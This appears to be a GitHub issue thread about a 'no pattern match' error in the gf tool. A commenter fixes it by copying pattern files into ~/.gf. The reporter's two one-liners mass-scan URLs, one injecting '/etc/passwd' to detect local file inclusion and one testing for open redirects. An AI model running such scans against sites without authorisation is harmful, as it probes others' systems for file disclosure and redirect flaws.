
no pattern match

Opened this issue · 2 comments


Whenever I include gf in any one liner , I always get no pattern match error.
I have given two one liners below where I am getting this error.
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Could you please tell me why it is happening ?

Best Regards,


facing a similar issue, can someone help?

My findings:

When performing 'gf --list' I got no results and I found I did not have a ~/.gf directory. I searched and found the json pattern files here: /home/[username]/go/src/

My fix:
mkdir ~/.gf && cp /home/[username]/go/src/* ~/.gf/

gf works as expected now.